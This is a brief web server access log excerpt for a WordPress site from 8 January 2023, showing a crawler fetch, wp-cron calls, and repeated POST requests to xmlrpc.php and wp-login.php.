114.119.139.198 - - [08/Jan/2023:13:21:10 -0800] "GET /robots.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
148.72.211.177 - - [08/Jan/2023:13:25:40 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.211 - - [08/Jan/2023:13:25:44 -0800] "POST /wp-cron.php?doing_wp_cron=1673213144.3128659725189208984375 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673213144.3128659725189208984375" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
121.36.241.28 - - [08/Jan/2023:13:34:12 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
103.153.214.231 - - [08/Jan/2023:13:43:01 -0800] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "gatipackers.com"
10.213.116.211 - - [08/Jan/2023:13:43:05 -0800] "POST /wp-cron.php?doing_wp_cron=1673214185.0390019416809082031250 HTTP/1.1" 200 - "http://gatipackers.com/wp-cron.php?doing_wp_cron=1673214185.0390019416809082031250" "WordPress/6.1.1; http://gatipackers.com" "gatipackers.com"
46.183.115.231 - - [08/Jan/2023:13:52:08 -0800] "POST /wp-login.php HTTP/1.1" 200 6923 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "gatipackers.com"
